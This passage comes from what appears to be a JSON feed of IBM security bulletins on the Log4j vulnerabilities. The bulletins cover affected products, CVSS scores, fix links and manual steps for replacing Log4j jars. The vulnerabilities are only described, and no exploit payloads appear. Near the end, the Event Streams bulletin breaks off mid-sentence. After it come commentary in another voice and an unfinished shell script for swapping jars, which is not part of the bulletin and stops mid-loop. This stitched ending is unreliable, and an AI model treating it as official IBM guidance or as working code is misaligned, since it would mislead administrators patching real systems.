option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. 
They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| [IT39584](<https://www.ibm.com/support/pages/apar/IT39584> \"IT39584\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140511_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A845800489744802176&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13806_140509_DSClients-linuxia32-client-11.5.6.0-FP000%3A517046716861436544&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140512_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A956085215716772224&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140513_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A437126386150870272&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or 
zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140510_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A526111219902489984&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13806_140508_DSClients-nt32-client-11.5.6000.1809-FP000%3A411600865803667264&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140507_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A273075359147908384&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| 11.5.8| [IT39584](<https://www.ibm.com/support/pages/apar/IT39584> \"IT39584\" )| <https://www.ibm.com/support/pages/node/6830623> \n \n## Workarounds and Mitigations\n\nOn a Unix-type system, if you are not using Federation wrappers, you can remove log4j jar files. 
\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-11T17:14:24", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-11-11T17:14:24", "id": "6DF2E72D03F9AA8435A0A58D154D82EDF5203309F8C81C42E35CBC71D2A79BDD", "href": "https://www.ibm.com/support/pages/node/6549888", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:53:57", "description": "## Summary\n\nWebSphere Application Server (WAS) is shipped as a component of IBM Security Guardium Key Lifecycle Manager (GKLM). Information about the Apache Log4j vulnerability has been published in a security bulletin. 
Customers are encouraged to take quick action to update their systems.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n\n\n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam.\n\n \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version(s)** \n \n---|--- \nIBM Security Key Lifecycle Manager (SKLM) v2.7** [EOS] | WebSphere Application Server v9.0.0.1 \nIBM Security Key Lifecycle Manager (SKLM) v3.0 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v3.0.1 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v4.0 | WebSphere Application Server v9.0.5.0 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1 | WebSphere Application Server v9.0.5.5 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1.1 | WebSphere Application Server Liberty 21.0.0.6 \n \n****** IBM Security Key Lifecycle Manager (SKLM) v2.7 - Applicable only for customer with extension.\n\n## Remediation/Fixes\n\n**IMPORTANT**\n\nThe fix in this bulletin has been superseded by [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, 
CVE-2021-45105 and CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6539408>). \n--- \n \n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\nDepending on your GKLM/SKLM version, see the relevant section:\n\n * For SKLM 3.0, 3.0.1 and SKLM 4.0\n * For GKLM 4.1.0\n * For GKLM 4.1.1\n\n* * *\n\n## For SKLM 3.0, 3.0.1 and SKLM 4.0\n\nFor information about the vulnerability fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ).\n\nYou only need to apply the interim fix provided by the WAS team. Before you apply the interim fix, check the WAS minimum fix pack requirement and the supported WAS for your SKLM version (see [Support Matrix](<https://www.ibm.com/support/pages/node/296957>)). \n\nFor instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>).\n\n**Note:** _Also applicable for SKLM 2.7_ (**only for customers with extension**).\n\n**Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply the Java SDK update. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1.0\n\n 1. On Linux and AIX systems, log in as the database user. For example, sklmdb41.\n 2. 
Stop WebSphere Application Server.\n\n**On Linux or AIX:**\n \n WAS_HOME/bin/stopServer.sh server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/stopServer.sh server1 -username wasadmin -password waspassword\n\n**On Windows:**\n \n WAS_HOME\\bin\\stopServer.bat server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\stopServer.bat server1 -username wasadmin -password waspassword\n\n 3. Apply the WebSphere Application Server interim fix provided by the WAS team. For instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>). \n\nFor information about the vulnerability and fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) . \n\n**Note**: You only need to apply the interim fix provided by the WAS team.\n\n 4. Update Log4j.\n\n 1. Download the Log4j 2.15.0 files from the following link: \n\n<https://archive.apache.org/dist/logging/log4j/2.15.0/>\n\n 2. Depending on your platform, download the applicable file: \n * apache-log4j-2.15.0-bin.tar.gz\n * apache-log4j-2.15.0-bin.zip\n 3. Extract the downloaded files. Copy the following extracted JAR files to some other location (for example, desktop): \n * log4j-api-2.15.0.jar\n * log4j-core-2.15.0.jar\n 4. Rename the JAR files as follows: \n * log4j-api-2.15.0.jar to log4j-api-2.13.3.jar\n * log4j-core-2.15.0.jar to log4j-core-2.13.3.jar\n\n**Note:** This is a workaround. Because the files are renamed, a grep on file names still shows log4j-api-2.13.3.jar after you apply the fix; the contents of the JAR files are Log4j 2.15.0.\n\n 5. 
Copy the renamed Log4j JAR files to the following location, replacing the existing log4j-api-2.13.3.jar and log4j-core-2.13.3.jar: \n\n**On Linux or AIX:**\n \n WAS_HOME/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\n**On Windows:**\n \n WAS_HOME\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\n 5. Start WebSphere Application Server. \n\n**On Linux or AIX:**\n \n WAS_HOME/bin/startServer.sh server1\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/startServer.sh server1\n\n**On Windows:**\n \n WAS_HOME\\bin\\startServer.bat server1\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\startServer.bat server1\n\n**Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply the Java SDK update. No other manual step is required.\n\n* * *\n\n## For GKLM 4.1.1\n\nThis issue is fixed in [GKLM 4.1.1 - Fix Pack 2](<https://www.ibm.com/support/pages/node/6525282> \"GKLM 4.1.1 - Fix Pack 2\" ). 
You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral>).\n\n* * *\n\n** **\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T14:07:15", "type": "ibm", "title": "Security Bulletin: Apache Log4j (CVE-2021-44228) vulnerability in WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (SKLM) and IBM Security Guardium Key Lifecycle Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-04T14:07:15", "id": "30E9FB4250193CA2C5AB02F5095C96F34F2044E06280324E18E38EEFD7C1490E", "href": "https://www.ibm.com/support/pages/node/6527756", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:54:45", "description": "## Summary\n\nIBM Cognos Analytics is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. 
This bulletin addresses the exposure to the Apache Log4j (CVE-2021-44228) vulnerability. Please note that this Security Bulletin has been superseded by Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832). See References section below.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nIf you have one of the listed affected versions, it is strongly recommended that you apply the most recent security update. \n\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc. 
you will access the Interim Fix via the link under the Bundled Customers.\n\nAffected Version\n\n| \n\nFix Version\n\n| \n\nBundled Customers \n \n---|---|--- \n \nIBM Cognos Analytics 11.2.x\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nIBM Cognos Analytics 11.1.x\n\n| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" ) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \n \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nCVE-2021-44228 has been remediated on all IBM Cognos Analytics on Cloud environments.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team have developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the patch is applicable to 
IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at the Java startup time. It removes the vulnerable JNDI lookup, and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"<log4jSafeAgent2021 Bundled>\" )\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:30:06", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-04-20T19:30:06", "id": "40793F706E8E7D40E73D53F66523BA8AE8718C40C00FCEF117CE8DEAC4566FD6", "href": "https://www.ibm.com/support/pages/node/6526474", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:45", "description": "## Summary\n\nVulnerabilities in Apache Log4j could result in a denial of service or remote code execution. These vulnerabilities may affect the Help system in IBM Spectrum Protect Operations Center. The below fix packages include Apache Log4j 2.17\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Protect Operations Center| 8.1.0.000-8.1.13.100 \n7.1.0.000-7.1.14.100 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing this vulnerability now by upgrading to the fixed level instead of using the manual process described under Workarounds and Mitigations section.**\n\n**Note: The below fix packages include Log4j 2.17.**\n\n**_IBM Spectrum Protect Operations Center Affected Versions \n_**| **_Fixing \nLevel_**| **_Platform_**| **_Link to Fix and Instructions \n_** \n---|---|---|--- \n \n8.1.0.000-8.1.13.100| \n8.1.13.200| AIX \nLinux \nWindows| \n<https://www.ibm.com/support/pages/node/6527288> \n \n7.1.0.000-7.1.14.100\n\n| 7.1.14.200| AIX \nLinux \nWindows| <https://www.ibm.com/support/pages/node/6527284> \n \n## Workarounds and Mitigations\n\n**Manual Procedure to Update the Help system**\n\nThe Help system shipped along with the Operations Center includes the affected log4j versions. To manually update the Help system: \n\n\n1\\. Download the following from Apache:\n\nApache Log4j 2 binary(zip) apache-log4j-2.17.0-bin.zip\n\n<https://logging.apache.org/log4j/2.0/download.html>\n\n2\\. 
Stop the Operations Center service (which also stops the Help system)\n\nAIX - /opt/tivoli/tsm/ui/utils/stopserver.sh\n\nLinux -\n\n8.1.9 and Lower (including v7) - service opscenter.rc stop\n\n8.1.10 and higher - systemctl stop opscenter.service\n\nWindows - From the Services window, stop the IBM Spectrum\u00ae Protect Operations Center service.\n\n3\\. Unzip the apache-log4j-2.17.0-bin.zip\n\n4\\. From the unzipped directory apache-log4j-2.17.0-bin, copy the Log4j 2.17.0 jars into the Help system library directory listed in step 5 and remove the earlier ones.\n\n5\\. In\n\nAIX and Linux - /opt/tivoli/tsm/ui/Liberty/usr/servers/guiServer/apps/TSM_HELP.war/WEB-INF/lib/\n\nWindows - c:\\Program Files\\Tivoli\\TSM\\ui\\Liberty\\usr\\servers\\guiServer\\apps\\TSM_HELP.war\\WEB-INF\\lib\\\n\nreplace:\n\nlog4j-api-2.8.2.jar\n\nlog4j-1.2-api-2.8.2.jar\n\nlog4j-core-2.8.2.jar\n\nlog4j-slf4j-impl-2.8.2.jar\n\nwith\n\nlog4j-api-2.17.0.jar\n\nlog4j-1.2-api-2.17.0.jar\n\nlog4j-core-2.17.0.jar\n\nlog4j-slf4j-impl-2.17.0.jar\n\n6\\. Restart the Operations Center service\n\nAIX - /opt/tivoli/tsm/ui/utils/startserver.sh\n\nLinux -\n\n8.1.9 and Lower (including v7) - service opscenter.rc start\n\n8.1.10 and higher - systemctl start opscenter.service\n\nWindows - From the Services window, start the IBM Spectrum\u00ae Protect Operations Center service.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T17:59:18", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j affect IBM Spectrum Protect Operations Center (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-27T17:59:18", "id": "342C70DE6943237DCB4E2BCA66A117A8AC4A929DA3631A2BB88E27D99C1A1F68", "href": "https://www.ibm.com/support/pages/node/6537240", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:48", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library. The library is used by IBM Event Streams.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
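The GKLM 4.1.0 and Spectrum Protect Operations Center instructions above come down to the same manual operation: stop the server, swap the Log4j jars inside an application's lib directory for the fixed versions (GKLM keeps the old 2.13.3 file names so the product's own checks keep passing), and start it again. The function below is an added example of that swap done defensively; it is not IBM's procedure or tooling, and the function name, the backup layout and the sample jars are mine. It verifies that every replacement jar exists before touching anything, ignores the -sources/-javadoc/-tests jars that the Apache binary zip also contains, keeps the old jars in a backup directory beside (not inside) the lib directory, and records which source file, identified by cksum, now sits under which name, so the renamed-jar caveat in the GKLM note can be answered later without unpacking anything. Stopping and starting the server is left to the product commands quoted in the bulletins. Note also that Log4j 2.15.0, which the GKLM 4.1.0 path installs, is itself still open to CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832, which is why that bulletin is marked as superseded.

```sh
#!/bin/sh
# Added example (not IBM code): swap the Log4j 2 jars in an application lib
# directory for the fixed versions the way the GKLM and Spectrum Protect
# bulletins describe by hand, with the checks an operator wants: verify every
# replacement exists before touching anything, keep the old jars in a backup
# outside the lib directory, and write down what was installed.
# Stop the server first (the bulletins' stopServer.sh / stopserver.sh step).

# replace_log4j_jars LIBDIR NEWDIR [keep]
#   LIBDIR  directory holding the application's log4j-<artifact>-<ver>.jar files
#   NEWDIR  directory holding the fixed jars, e.g. an unpacked apache-log4j-2.17.0-bin
#   keep    install each new jar under the OLD file name (the GKLM 4.1.0
#           2.15.0-as-2.13.3 workaround); default is the new jar's own name
# Prints the path of the record file. Returns 1 and changes nothing if any
# replacement jar is missing.
replace_log4j_jars() {
  libdir="$1"; newdir="$2"; mode="${3:-rename}"
  plan=""
  for old in "$libdir"/log4j-*.jar; do
    [ -e "$old" ] || continue
    artifact=$(basename "$old" .jar | sed -n 's/^\(log4j-.*\)-[0-9][0-9.]*$/\1/p')
    [ -n "$artifact" ] || continue
    new=""
    for cand in "$newdir/$artifact"-[0-9]*.jar; do
      [ -e "$cand" ] || continue
      # accept only <artifact>-<version>.jar, not the -sources/-javadoc/-tests jars
      basename "$cand" .jar | grep -q -x "$artifact-[0-9][0-9.]*" && new="$cand"
    done
    if [ -z "$new" ]; then
      echo "no replacement for $artifact in $newdir; nothing changed" >&2
      return 1
    fi
    plan="$plan$old|$new
"
  done
  [ -n "$plan" ] || { echo "no log4j jars in $libdir" >&2; return 1; }

  # The backup lives beside, not inside, the lib directory: neither the class
  # loader nor a vulnerability scanner should find the old jar there again.
  backup="$(dirname "$libdir")/$(basename "$libdir").log4j-backup-$(date +%Y%m%d%H%M%S)"
  mkdir -p "$backup" || return 1
  record="$backup/INSTALLED.txt"
  while IFS='|' read -r old new; do
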